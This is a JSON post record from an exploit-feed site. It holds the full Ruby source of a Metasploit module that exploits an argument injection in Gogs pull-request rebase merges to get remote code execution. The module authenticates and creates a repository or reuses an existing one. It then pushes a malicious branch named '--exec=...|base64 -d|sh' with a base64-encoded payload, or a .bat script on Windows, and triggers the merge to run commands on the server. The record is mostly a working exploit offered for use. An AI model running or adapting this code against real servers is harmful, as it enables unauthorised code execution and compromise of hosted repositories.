{"id":59556,"date":"2026-06-03T15:48:48","date_gmt":"2026-06-03T15:48:48","guid":{"rendered":"https:\/\/zero.redgem.net\/?p=59556"},"modified":"2026-06-03T15:48:48","modified_gmt":"2026-06-03T15:48:48","slug":"gogs-git-rebase-argument-injection-rce","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=59556","title":{"rendered":"Gogs Git Rebase Argument Injection RCE_MSF:EXPLOIT-MULTI-HTTP-GOGS_REBASE_RCE-"},"content":{"rendered":"

{“lastseen”:”2026-06-03T19:33:07″,”description”:”This module exploits an argument injection vulnerability in the pull request merge flow of Gogs is parsed by Git as the –exec flag rather than a positional argument, causing sh -c to run after each replayed commit during the rebase. Two exploitation…”,”published”:”2026-06-03T19:01:27″,”modified”:”2026-06-03T19:01:27″,”type”:”metasploit”,”title”:”Gogs Git Rebase Argument Injection RCE”,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-MULTI-HTTP-GOGS_REBASE_RCE-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”# frozen_string_literal: true\\n\\n##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Remote\\n\\n Rank = ExcellentRanking\\n\\n prepend Msf::Exploit::Remote::AutoCheck\\n include Msf::Exploit::Remote::HttpClient\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Gogs Git Rebase Argument Injection RCE’,\\n ‘Description’ =\\u003e %q{\\n This module exploits an argument injection vulnerability in the\\n pull request merge flow of Gogs (\\u003c= 0.14.2 and \\u003c= 0.15.0+dev).\\n\\n The Merge() function in internal\/database\/pull.go passes the PR\\n base branch name to `git rebase` without a `–` separator. A\\n branch named `–exec=\\u003cCMD\\u003e` is parsed by Git as the –exec flag\\n rather than a positional argument, causing `sh -c \\u003cCMD\\u003e` to run\\n after each replayed commit during the rebase.\\n\\n Two exploitation methods are supported:\\n\\n – own_repo: The attacker creates a temporary repository, enables\\n rebase merge, and operates entirely within their own account.\\n Any authenticated user who can create repositories (the default)\\n can exploit this with no interaction from other users required.\\n\\n – existing_repo: The attacker exploits a repository they already\\n have write and merge access to, where \\”Rebase before merging\\”\\n is enabled (or the attacker has repo admin permissions to\\n enable it). This path is useful on instances where repository\\n creation is restricted.\\n\\n Both methods use git to push divergent branches (including the\\n malicious –exec= branch), open a pull request, and trigger a\\n rebase merge to execute the payload. A local git installation\\n is required.\\n\\n On Unix targets, the payload is base64-encoded inline in\\n the malicious branch name, avoiding the need to commit files\\n to the repository. On Windows targets, the payload is\\n delivered via a script file committed to the repository,\\n since NTFS forbids pipe characters in filenames. Git for\\n Windows uses MSYS2 sh for –exec commands, enabling\\n cross-platform exploitation.\\n\\n Note: a successful rebase merge may leave the server-side\\n repository in a corrupted git state (mid-rebase). For\\n own_repo this is inconsequential because the repository is\\n deleted. For existing_repo this can break the target\\n repository and prevent re-exploitation against the same repo.\\n\\n The Gogs API does not support token deletion, so the API\\n access token created during exploitation cannot be removed\\n automatically and will persist under the attacker account.\\n },\\n ‘Author’ =\\u003e [\\n ‘Crypto-Cat’, # Vulnerability discovery and Metasploit module\\n ],\\n ‘References’ =\\u003e [\\n # [‘CVE’, ”],\\n [‘GHSA’, ‘qf6p-p7ww-cwr9’, ‘gogs\/gogs’],\\n [‘URL’, ‘https:\/\/www.rapid7.com\/blog\/post\/ve-authenticated-rce-via-argument-injection-gogs-unfixed’],\\n [‘URL’, ‘https:\/\/github.com\/gogs\/gogs’],\\n ],\\n ‘DisclosureDate’ =\\u003e ‘2026-03-17’,\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Platform’ =\\u003e [‘unix’, ‘linux’, ‘win’],\\n ‘Arch’ =\\u003e ARCH_CMD,\\n ‘Privileged’ =\\u003e false,\\n ‘Targets’ =\\u003e [\\n [\\n ‘Unix Command’,\\n {\\n ‘Platform’ =\\u003e [‘linux’, ‘unix’],\\n ‘Arch’ =\\u003e ARCH_CMD,\\n ‘Type’ =\\u003e :unix_cmd,\\n ‘DefaultOptions’ =\\u003e {\\n ‘FETCH_COMMAND’ =\\u003e ‘WGET’,\\n ‘FETCH_WRITABLE_DIR’ =\\u003e ‘\/tmp\/’\\n }\\n }\\n ],\\n [\\n ‘Windows Command’,\\n {\\n ‘Platform’ =\\u003e ‘win’,\\n ‘Arch’ =\\u003e ARCH_CMD,\\n ‘Type’ =\\u003e :win_cmd,\\n ‘DefaultOptions’ =\\u003e {\\n ‘FETCH_COMMAND’ =\\u003e ‘CURL’\\n }\\n }\\n ]\\n ],\\n ‘DefaultOptions’ =\\u003e {\\n ‘RPORT’ =\\u003e 3000,\\n ‘WfsDelay’ =\\u003e 30\\n },\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘SideEffects’ =\\u003e [CONFIG_CHANGES, ARTIFACTS_ON_DISK, IOC_IN_LOGS],\\n # Not REPEATABLE_SESSION: existing_repo can corrupt the target\\n # repo’s git state (mid-rebase), preventing re-exploitation.\\n ‘Reliability’ =\\u003e []\\n }\\n )\\n )\\n\\n register_options([\\n OptString.new(‘USERNAME’, [true, ‘Gogs username’, nil]),\\n OptString.new(‘PASSWORD’, [true, ‘Gogs password’, nil]),\\n OptEnum.new(‘EXPLOIT_METHOD’, [\\n true, ‘Exploit method: own_repo creates a temporary repo, existing_repo targets a repo the attacker has write access to’,\\n ‘own_repo’, [‘own_repo’, ‘existing_repo’]\\n ]),\\n OptString.new(‘REPO_OWNER’, [false, ‘Owner of the target repository (required for existing_repo)’, nil], conditions: %w[EXPLOIT_METHOD == existing_repo]),\\n OptString.new(‘REPO_NAME’, [false, ‘Name of the target repository (required for existing_repo)’, nil], conditions: %w[EXPLOIT_METHOD == existing_repo]),\\n OptBool.new(‘ENABLE_REBASE’, [\\n true, ‘Enable rebase merge in repository settings (existing_repo requires repo admin access)’, true\\n ]),\\n ])\\n\\n @need_cleanup = false\\n end\\n\\n # Maps CSS\/JS commit hashes to Gogs release versions for fingerprinting.\\n # The hash appears in the ?v= parameter of static asset URLs on unauthenticated pages.\\n COMMIT_TO_VERSION = {\\n ‘5dcb6c64bdf61e38dbdbb941c1d69789c560d0fb’ =\\u003e ‘0.14.2’,\\n ‘f5c8030c1fd936f3e0e9f774e3c7c39fd102f56f’ =\\u003e ‘0.14.1’,\\n ’36c26c4ccc3ca0339db53eb1fa41e4e86b55163d’ =\\u003e ‘0.14.0’,\\n ‘d958a47a0e9d8747e399c687fdb3ec64a3b1a736’ =\\u003e ‘0.13.4’,\\n ‘5084b4a9b77a506f5e287e82e945e1c6882b827a’ =\\u003e ‘0.13.3’,\\n ‘593c7b6db601c68d16b2fb9a7e1194cb816f5efb’ =\\u003e ‘0.13.2’,\\n ‘0c40e600a275d490481cfeea53705810fbe94d9b’ =\\u003e ‘0.13.1’,\\n ‘8c21874c00b6100d46b662f65baeb40647442f42’ =\\u003e ‘0.13.0’,\\n ‘c9fba3cb30af0789fcf89098dfcb8f2286ee7d3b’ =\\u003e ‘0.12.11’,\\n ‘1ce5171ae170750298c150874e718740dd7ef69f’ =\\u003e ‘0.12.10’,\\n ‘012a1ba19ed2f8f5185be4254f655ba6c4b34db2’ =\\u003e ‘0.12.9’,\\n ‘7f8799c01f264eb7770766621fb68debee414b68’ =\\u003e ‘0.12.8’,\\n ‘d06ba7e527fcc462aecdb660ce001e87d94f024c’ =\\u003e ‘0.12.7’,\\n ‘26395294bdef382b577fd60234e5bb14f4090cc8’ =\\u003e ‘0.12.6’\\n }.freeze\\n\\n def own_repo?\\n datastore[‘EXPLOIT_METHOD’] == ‘own_repo’\\n end\\n\\n def check\\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path)\\n )\\n return CheckCode::Unknown(‘Target did not respond.’) unless res\\n\\n unless res.body.to_s.match(\/\\u003cmeta +name=\\”author\\” +content=\\”Gogs\\”\/)\\n return CheckCode::Safe(‘Target does not appear to be running Gogs.’)\\n end\\n\\n # Fingerprint via static asset commit hash (unauthenticated, all versions)\\n version = nil\\n hash_match = res.body.to_s.match(\/gogs\\\\.min\\\\.css\\\\?v=([a-f0-9]{40})\/)\\n if hash_match\\n version = COMMIT_TO_VERSION[hash_match[1]]\\n vprint_status(\\”Unknown Gogs commit hash: #{hash_match[1]}\\”) unless version\\n end\\n\\n service_info = version ? \\”Gogs Git Service #{version}\\” : ‘Gogs Git Service’\\n report_gogs_service(service_info)\\n\\n if version\\n ver = Rex::Version.new(version)\\n # NOTE: No fix exists yet. We assume a future version \\u003e 0.14.2 will\\n # include a patch. If the next release (e.g. 0.14.3) is still\\n # vulnerable, update this threshold accordingly.\\n if ver \\u003c= Rex::Version.new(‘0.14.2’)\\n return CheckCode::Appears(\\”Gogs #{version} detected.\\”)\\n else\\n return CheckCode::Safe(\\”Gogs #{version} detected.\\”)\\n end\\n end\\n\\n CheckCode::Detected(‘Gogs detected, but could not determine version.’)\\n end\\n\\n def exploit\\n fail_with(Failure::BadConfig, ‘Local git installation required but not found’) unless git_available?\\n\\n unless own_repo?\\n fail_with(Failure::BadConfig, ‘REPO_OWNER is required when EXPLOIT_METHOD is existing_repo’) if datastore[‘REPO_OWNER’].blank?\\n fail_with(Failure::BadConfig, ‘REPO_NAME is required when EXPLOIT_METHOD is existing_repo’) if datastore[‘REPO_NAME’].blank?\\n end\\n\\n print_status(\\”Executing #{target.name} for #{datastore[‘PAYLOAD’]}\\”)\\n\\n # Authenticate (API token first, before web login adds session cookies)\\n print_status(\\”Authenticating as \\\\\\”#{datastore[‘USERNAME’]}\\\\\\”\\”)\\n create_api_token\\n gogs_login\\n print_good(‘Authenticated’)\\n\\n if own_repo?\\n @repo_name = \\”#{Rex::Text.rand_text_alpha_lower(4)}-#{Rex::Text.rand_text_alpha_lower(4)}\\”\\n @repo_path = \\”#{datastore[‘USERNAME’]}\/#{@repo_name}\\”\\n print_status(\\”Creating repository \\\\\\”#{@repo_name}\\\\\\”\\”)\\n create_repo\\n @need_cleanup = true\\n print_good(‘Repository created’)\\n\\n print_status(‘Enabling rebase merge in repository settings’)\\n enable_rebase_merge\\n print_good(‘Rebase merge enabled’)\\n else\\n @repo_name = datastore[‘REPO_NAME’]\\n @repo_path = \\”#{datastore[‘REPO_OWNER’]}\/#{@repo_name}\\”\\n print_status(\\”Using existing repository \\\\\\”#{@repo_path}\\\\\\”\\”)\\n validate_existing_repo\\n @need_cleanup = true\\n\\n if datastore[‘ENABLE_REBASE’]\\n try_enable_rebase\\n else\\n print_status(‘Assuming rebase merge is already enabled (set ENABLE_REBASE to change settings)’)\\n end\\n end\\n\\n case target[‘Type’]\\n when :unix_cmd\\n # Base64-encode the payload inline in the branch name. Pipes are\\n # valid in Linux\/macOS refs but forbidden on NTFS, so this is\\n # Unix-only. No script file needs to be committed to the repo.\\n wrapped = \\”(#{payload.encoded}) \\u003c\/dev\/null \\u003e\/dev\/null 2\\u003e\\u00261 \\u0026\\”\\n b64 = Rex::Text.encode_base64(wrapped)\\n # Git ref names forbid ‘\/\/’; re-pad with leading spaces until safe\\n padding = 0\\n while b64.include?(‘\/\/’) \\u0026\\u0026 padding \\u003c 50\\n padding += 1\\n b64 = Rex::Text.encode_base64(‘ ‘ * padding + wrapped)\\n end\\n @malicious_branch = \\”–exec=echo${IFS}#{b64}|base64${IFS}-d|sh\\”\\n\\n when :win_cmd\\n # NTFS forbids | in filenames so we can’t use the base64|sh\\n # approach. Instead, commit a script file to the repo.\\n # MSYS2 sh mangles $, \\u0026 etc. so write the payload to a .bat and\\n # have the sh wrapper invoke cmd.exe instead.\\n rand_name = Rex::Text.rand_text_alpha_lower(6)\\n @payload_content = payload.encoded\\n @payload_file = \\”.#{rand_name}\\”\\n @bat_file = \\”.#{rand_name}.bat\\”\\n @malicious_branch = \\”–exec=sh${IFS}#{@payload_file}\\”\\n end\\n\\n print_status(‘Pushing branches via git’)\\n setup_branches_via_git\\n print_good(‘Branches pushed’)\\n\\n print_status(‘Creating pull request’)\\n @pr_number = create_pull_request\\n print_good(\\”PR ##{@pr_number} created\\”)\\n\\n print_status(‘Triggering rebase merge’)\\n trigger_rebase_merge\\n report_vuln(\\n host: rhost,\\n port: rport,\\n proto: ‘tcp’,\\n name: name,\\n info: \\”Exploited via #{datastore[‘EXPLOIT_METHOD’]} method\\”,\\n refs: references,\\n service: report_gogs_service(‘Gogs Git Service’)\\n )\\n print_good(‘Rebase merge triggered, waiting for shell…’)\\n end\\n\\n # —————————————————————\\n # Authentication\\n # —————————————————————\\n\\n def gogs_login\\n res = http_post_request(\\n ‘\/user\/login’,\\n user_name: datastore[‘USERNAME’],\\n password: datastore[‘PASSWORD’]\\n )\\n fail_with(Failure::Unreachable, ‘Login page unreachable’) unless res\\n fail_with(Failure::NoAccess, ‘Login failed – check credentials’) unless res.code == 302\\n end\\n\\n def create_api_token\\n preflight = send_request_cgi(\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘api’, ‘v1’)\\n )\\n fail_with(Failure::Unreachable, ‘Gogs API not responding’) unless preflight\\n\\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘api’, ‘v1’, ‘users’, datastore[‘USERNAME’], ‘tokens’),\\n ‘ctype’ =\\u003e ‘application\/json’,\\n ‘headers’ =\\u003e { ‘Authorization’ =\\u003e basic_auth(datastore[‘USERNAME’], datastore[‘PASSWORD’]) },\\n ‘data’ =\\u003e { name: \\”msf_#{Rex::Text.rand_text_alpha_lower(8)}\\” }.to_json\\n )\\n fail_with(Failure::UnexpectedReply, \\”API token creation failed (HTTP #{res\\u0026.code})\\”) unless res\\u0026.code == 201\\n\\n @api_token = res.get_json_document[‘sha1’]\\n vprint_good(\\”API token: #{@api_token}\\”)\\n end\\n\\n # —————————————————————\\n # Repository setup\\n # —————————————————————\\n\\n def create_repo\\n res = api_request(\\n ‘POST’,\\n ‘\/api\/v1\/user\/repos’,\\n { name: @repo_name, private: true, default_branch: ‘master’ }.to_json\\n )\\n fail_with(Failure::UnexpectedReply, \\”Repo creation failed: #{res\\u0026.code}\\”) unless res\\u0026.code == 201\\n end\\n\\n def enable_rebase_merge\\n res = http_post_request(\\n \\”\/#{@repo_path}\/settings\\”,\\n action: ‘advanced’,\\n enable_pulls: ‘on’,\\n pulls_allow_rebase: ‘on’\\n )\\n fail_with(Failure::Unreachable, ‘Settings page unreachable’) unless res\\n fail_with(Failure::UnexpectedReply, ‘Failed to enable rebase merge’) unless [200, 302].include?(res.code)\\n end\\n\\n def validate_existing_repo\\n res = api_request(‘GET’, \\”\/api\/v1\/repos\/#{@repo_path}\\”)\\n fail_with(Failure::BadConfig, \\”Repository #{@repo_path} not found or not accessible\\”) unless res\\u0026.code == 200\\n\\n repo_info = res.get_json_document\\n db = repo_info[‘default_branch’].to_s\\n @default_branch = db.empty? ? ‘master’ : db\\n vprint_status(\\”Default branch: #{@default_branch}\\”)\\n print_good(\\”Repository #{@repo_path} confirmed accessible\\”)\\n end\\n\\n def try_enable_rebase\\n print_status(‘Attempting to enable rebase merge in repository settings’)\\n settings_uri = normalize_uri(target_uri.path, @repo_path, ‘settings’)\\n\\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e settings_uri,\\n ‘keep_cookies’ =\\u003e true\\n )\\n\\n unless res \\u0026\\u0026 res.code == 200\\n print_warning(‘Could not access repository settings (may require repo admin). Ensure rebase merge is already enabled.’)\\n return\\n end\\n\\n doc = res.get_html_document\\n csrf = doc.at_xpath(\\”\/\/input[@name=’_csrf’]\/@value\\”)\\u0026.text\\n unless csrf\\n print_warning(‘Could not extract CSRF from settings page. Ensure rebase merge is already enabled.’)\\n return\\n end\\n\\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e settings_uri,\\n ‘keep_cookies’ =\\u003e true,\\n ‘ctype’ =\\u003e ‘application\/x-www-form-urlencoded’,\\n ‘vars_post’ =\\u003e {\\n ‘_csrf’ =\\u003e csrf,\\n ‘action’ =\\u003e ‘advanced’,\\n ‘enable_pulls’ =\\u003e ‘on’,\\n ‘pulls_allow_rebase’ =\\u003e ‘on’\\n }\\n )\\n\\n if res \\u0026\\u0026 [200, 302].include?(res.code)\\n print_good(‘Rebase merge enabled’)\\n else\\n print_warning(‘Could not enable rebase merge. Ensure it is already enabled.’)\\n end\\n end\\n\\n # —————————————————————\\n # Branch setup via local git\\n # —————————————————————\\n\\n def setup_branches_via_git\\n @tmpdir = Dir.mktmpdir(‘msf_gogs_’)\\n workdir = File.join(@tmpdir, ‘work’)\\n clone_url = build_clone_url\\n\\n if own_repo?\\n run_git!([‘init’, workdir])\\n run_git!([‘remote’, ‘add’, ‘origin’, clone_url], workdir)\\n else\\n run_git!([‘clone’, clone_url, workdir])\\n end\\n\\n run_git!([‘config’, ‘user.email’, Faker::Internet.email], workdir)\\n run_git!([‘config’, ‘user.name’, Faker::Internet.username], workdir)\\n\\n if own_repo?\\n File.write(File.join(workdir, ‘README.md’), \\”# #{@repo_name}\\\\n\\”)\\n run_git!([‘add’, ‘.’], workdir)\\n run_git!([‘commit’, ‘-m’, ‘init’], workdir)\\n run_git!([‘push’, ‘-u’, ‘origin’, ‘master’], workdir)\\n end\\n\\n @feature_branch = \\”feature-#{Rex::Text.rand_text_alpha_lower(6)}\\”\\n run_git!([‘checkout’, ‘-b’, @feature_branch], workdir)\\n File.write(File.join(workdir, ‘feature.txt’), Rex::Text.rand_text_alpha(8))\\n run_git!([‘add’, ‘.’], workdir)\\n run_git!([‘commit’, ‘-m’, ‘feature’], workdir)\\n run_git!([‘push’, ‘origin’, @feature_branch], workdir)\\n\\n # Create a divergent commit to force a rebase. For existing_repo, use\\n # the repo’s default branch. Never push directly to the base branch.\\n base_branch = own_repo? ? ‘master’ : (@default_branch || ‘master’)\\n run_git!([‘checkout’, base_branch], workdir)\\n File.write(File.join(workdir, ‘diverge.txt’), Rex::Text.rand_text_alpha(8))\\n\\n # Write payload script files for Windows targets. Linux uses\\n # base64-encoded payload inline in the branch name instead.\\n if @bat_file\\n # sh wrapper -\\u003e cmd.exe -\\u003e .bat (\/\/c prevents MSYS2 path conversion)\\n File.write(File.join(workdir, @payload_file), \\”cmd.exe \/\/c #{@bat_file} \\u003c\/dev\/null \\u003e\/dev\/null 2\\u003e\\u00261 \\u0026\\\\n\\”)\\n File.write(File.join(workdir, @bat_file), @payload_content + \\”\\\\n\\”)\\n end\\n\\n run_git!([‘add’, ‘.’], workdir)\\n run_git!([‘commit’, ‘-m’, ‘diverge’], workdir)\\n\\n # Push malicious branch via refspec (bypasses checkout -b validation).\\n # Don’t push to the base branch itself (especially for existing_repo).\\n run_git!([‘push’, ‘origin’, \\”HEAD:refs\/heads\/#{@malicious_branch}\\”], workdir)\\n vprint_good(\\”Malicious branch: #{@malicious_branch}\\”)\\n\\n vprint_good(\\”Feature branch: #{@feature_branch}\\”)\\n end\\n\\n def build_clone_url\\n user_enc = Rex::Text.uri_encode(datastore[‘USERNAME’])\\n pass_enc = Rex::Text.uri_encode(datastore[‘PASSWORD’])\\n scheme = datastore[‘SSL’] ? ‘https’ : ‘http’\\n authority = Rex::Socket.to_authority(rhost, rport)\\n \\”#{scheme}:\/\/#{user_enc}:#{pass_enc}@#{authority}#{normalize_uri(target_uri.path, @repo_path)}.git\\”\\n end\\n\\n def git_available?\\n _out, _err, status = Open3.capture3(‘git’, ‘–version’)\\n status.success?\\n rescue Errno::ENOENT\\n false\\n end\\n\\n def run_git!(args, cwd = nil)\\n env = { ‘GIT_TERMINAL_PROMPT’ =\\u003e ‘0’ }\\n opts = {}\\n opts[:chdir] = cwd if cwd\\n stdout, stderr, status = Open3.capture3(env, ‘git’, *args, **opts)\\n unless status.success?\\n fail_with(Failure::Unknown, \\”Git #{args.first} failed: #{stderr.strip}\\”)\\n end\\n stdout\\n end\\n\\n # Non-fatal variant for cleanup operations where failure is acceptable\\n def run_git_safe(args, cwd = nil)\\n env = { ‘GIT_TERMINAL_PROMPT’ =\\u003e ‘0’ }\\n opts = {}\\n opts[:chdir] = cwd if cwd\\n _stdout, stderr, status = Open3.capture3(env, ‘git’, *args, **opts)\\n unless status.success?\\n vprint_warning(\\”Git #{args.first} failed: #{stderr.strip}\\”)\\n return false\\n end\\n true\\n rescue StandardError =\\u003e e\\n vprint_warning(\\”Git #{args.first} error: #{e.message}\\”)\\n false\\n end\\n\\n # —————————————————————\\n # Pull request and merge\\n # —————————————————————\\n\\n def create_pull_request\\n encoded_branch = Rex::Text.uri_encode(@malicious_branch)\\n compare_uri = \\”\/#{@repo_path}\/compare\/#{encoded_branch}…#{@feature_branch}\\”\\n\\n res = http_post_request(\\n compare_uri,\\n title: Rex::Text.rand_text_alpha(6),\\n content: ”,\\n assignee_id: ‘0’,\\n milestone_id: ‘0’\\n )\\n fail_with(Failure::Unreachable, ‘Compare page unreachable’) unless res\\n\\n if [302, 303].include?(res.code)\\n location = res.headers[‘Location’].to_s\\n pr_num = location.chomp(‘\/’).split(‘\/’).last\\n return pr_num if pr_num =~ \/^\\\\d+$\/\\n end\\n\\n # Fallback: find PR via API\\n res = api_request(‘GET’, \\”\/api\/v1\/repos\/#{@repo_path}\/pulls?state=open\\”)\\n if res\\u0026.code == 200\\n pulls = res.get_json_document\\n return pulls.last[‘number’].to_s unless pulls.empty?\\n end\\n\\n fail_with(Failure::UnexpectedReply, ‘PR creation failed’)\\n end\\n\\n def trigger_rebase_merge\\n merge_uri = \\”\/#{@repo_path}\/pulls\/#{@pr_number}\/merge\\”\\n\\n pr_uri = \\”\/#{@repo_path}\/pulls\/#{@pr_number}\\”\\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, pr_uri),\\n ‘keep_cookies’ =\\u003e true\\n )\\n csrf = extract_csrf(res)\\n\\n send_request_cgi({\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, merge_uri),\\n ‘keep_cookies’ =\\u003e true,\\n ‘ctype’ =\\u003e ‘application\/x-www-form-urlencoded’,\\n ‘vars_get’ =\\u003e { ‘merge_style’ =\\u003e ‘rebase_before_merging’ },\\n ‘vars_post’ =\\u003e {\\n ‘_csrf’ =\\u003e csrf,\\n ‘commit_description’ =\\u003e ”\\n }\\n }, 5)\\n # May return 500 (expected on exec), 302 (merged), or timeout (blocking shell)\\n\\n # Reset connection pool since the merge POST may have timed out\\n disconnect\\n end\\n\\n # —————————————————————\\n # HTTP helpers\\n # —————————————————————\\n\\n def api_request(method, uri, body = nil)\\n opts = {\\n ‘method’ =\\u003e method,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, uri),\\n ‘headers’ =\\u003e { ‘Authorization’ =\\u003e \\”token #{@api_token}\\” }\\n }\\n if body\\n opts[‘ctype’] = ‘application\/json’\\n opts[‘data’] = body\\n end\\n send_request_cgi(opts)\\n end\\n\\n def http_post_request(uri, opts = {})\\n full_uri = normalize_uri(target_uri.path, uri)\\n csrf = get_csrf(full_uri)\\n\\n post_data = { _csrf: csrf }.merge(opts)\\n send_request_cgi(\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e full_uri,\\n ‘ctype’ =\\u003e ‘application\/x-www-form-urlencoded’,\\n ‘keep_cookies’ =\\u003e true,\\n ‘vars_post’ =\\u003e post_data\\n )\\n end\\n\\n def get_csrf(uri)\\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e uri,\\n ‘keep_cookies’ =\\u003e true\\n )\\n fail_with(Failure::Unreachable, \\”Unable to reach #{uri}\\”) unless res\\n\\n extract_csrf(res)\\n end\\n\\n def extract_csrf(res)\\n fail_with(Failure::Unreachable, ‘No response to extract CSRF from’) unless res\\n\\n doc = res.get_html_document\\n csrf = doc.at_xpath(\\”\/\/input[@name=’_csrf’]\/@value\\”)\\u0026.text\\n fail_with(Failure::NotFound, ‘CSRF token not found in response’) if csrf.blank?\\n\\n csrf\\n end\\n\\n def basic_auth(user, pass)\\n \\”Basic #{Rex::Text.encode_base64(\\”#{user}:#{pass}\\”)}\\”\\n end\\n\\n # Returns a service object for linking to report_vuln.\\n # Builds the full layered service hierarchy: gogs -\\u003e [ssl -\\u003e] http -\\u003e tcp\\n def report_gogs_service(info)\\n base_opts = {\\n host: rhost,\\n port: rport,\\n proto: ‘tcp’\\n }\\n gogs_srv = base_opts.merge(name: ‘gogs’, info: info)\\n http_srv = base_opts.merge(name: ‘http’, parents: base_opts.merge(name: ‘tcp’))\\n gogs_srv[:parents] = datastore[‘SSL’] ? base_opts.merge(name: ‘ssl’, parents: http_srv) : http_srv\\n\\n report_service(gogs_srv)\\n end\\n\\n # —————————————————————\\n # Cleanup\\n # —————————————————————\\n\\n def cleanup\\n super\\n\\n if @need_cleanup\\n if own_repo?\\n cleanup_own_repo\\n else\\n cleanup_existing_repo\\n end\\n end\\n\\n # Clean up local temp directory AFTER remote cleanup (existing_repo\\n # branch deletion uses the local git workdir for push operations)\\n if @tmpdir \\u0026\\u0026 File.directory?(@tmpdir)\\n FileUtils.rm_rf(@tmpdir)\\n vprint_status(‘Local temp directory cleaned up’)\\n end\\n\\n # Gogs API has no token deletion endpoint, so warn the user\\n if @api_token\\n print_warning(‘API token \\”msf_*\\” persists on the target (Gogs API does not support token deletion)’)\\n end\\n end\\n\\n def cleanup_own_repo\\n print_status(\\”Cleaning up – deleting repository #{@repo_name}\\”)\\n\\n send_request_cgi(\\n ‘method’ =\\u003e ‘DELETE’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘\/api\/v1\/repos\/’, @repo_path),\\n ‘headers’ =\\u003e { ‘Authorization’ =\\u003e \\”token #{@api_token}\\” }\\n )\\n\\n verify = send_request_cgi(\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘\/api\/v1\/repos\/’, @repo_path),\\n ‘headers’ =\\u003e { ‘Authorization’ =\\u003e \\”token #{@api_token}\\” }\\n )\\n\\n if verify\\u0026.code == 404\\n print_good(\\”Repository #{@repo_name} deleted\\”)\\n elsif verify.nil?\\n print_warning(\\”Could not confirm deletion. Delete #{@repo_path} manually if it still exists.\\”)\\n else\\n print_warning(\\”Repository may still exist. Delete #{@repo_path} manually.\\”)\\n end\\n rescue ::Rex::ConnectionError, ::Errno::ECONNRESET =\\u003e e\\n print_warning(\\”Cleanup failed: #{e.message}. Delete #{@repo_path} manually.\\”)\\n end\\n\\n def cleanup_existing_repo\\n print_status(\\”Cleaning up artifacts from #{@repo_path}\\”)\\n delete_remote_branches\\n close_pull_request\\n rescue ::Rex::ConnectionError, ::Errno::ECONNRESET =\\u003e e\\n print_warning(\\”Cleanup failed: #{e.message}\\”)\\n print_warning(\\”Manually delete branches and close PR ##{@pr_number} in #{@repo_path}\\”)\\n end\\n\\n def delete_remote_branches\\n workdir = @tmpdir ? File.join(@tmpdir, ‘work’) : nil\\n return unless workdir \\u0026\\u0026 File.directory?(workdir)\\n\\n if @malicious_branch\\n vprint_status(\\”Deleting malicious branch from #{@repo_path}\\”)\\n if run_git_safe([‘push’, ‘origin’, ‘–delete’, \\”refs\/heads\/#{@malicious_branch}\\”], workdir)\\n print_good(‘Malicious branch deleted’)\\n else\\n print_warning(\\”Could not delete malicious branch. Delete it manually from #{@repo_path}\\”)\\n end\\n end\\n\\n if @feature_branch\\n vprint_status(\\”Deleting feature branch from #{@repo_path}\\”)\\n if run_git_safe([‘push’, ‘origin’, ‘–delete’, @feature_branch], workdir)\\n print_good(‘Feature branch deleted’)\\n else\\n print_warning(\\”Could not delete feature branch \\\\\\”#{@feature_branch}\\\\\\” from #{@repo_path}\\”)\\n end\\n end\\n end\\n\\n def close_pull_request\\n return unless @pr_number\\n\\n # GET the PR page for CSRF (must use \/pulls\/ path; \/issues\/ redirects)\\n pr_page = normalize_uri(target_uri.path, @repo_path, ‘pulls’, @pr_number)\\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e pr_page,\\n ‘keep_cookies’ =\\u003e true\\n )\\n\\n unless res\\n print_warning(\\”Could not load PR page to close PR ##{@pr_number}\\”)\\n return\\n end\\n\\n # Extract CSRF without fail_with (cleanup must not abort)\\n doc = res.get_html_document\\n csrf = doc.at_xpath(\\”\/\/input[@name=’_csrf’]\/@value\\”)\\u0026.text\\n unless csrf\\n print_warning(\\”Could not find CSRF token to close PR ##{@pr_number}\\”)\\n return\\n end\\n\\n comment_uri = normalize_uri(target_uri.path, @repo_path, ‘issues’, @pr_number, ‘comments’)\\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e comment_uri,\\n ‘keep_cookies’ =\\u003e true,\\n ‘ctype’ =\\u003e ‘application\/x-www-form-urlencoded’,\\n ‘vars_post’ =\\u003e {\\n ‘_csrf’ =\\u003e csrf,\\n ‘status’ =\\u003e ‘close’,\\n ‘content’ =\\u003e ”\\n }\\n )\\n\\n if res \\u0026\\u0026 [200, 302].include?(res.code)\\n print_good(\\”PR ##{@pr_number} closed\\”)\\n else\\n print_warning(\\”Could not close PR ##{@pr_number}. Close it manually in #{@repo_path}\\”)\\n end\\n rescue StandardError =\\u003e e\\n print_warning(\\”Failed to close PR: #{e.message}\\”)\\n 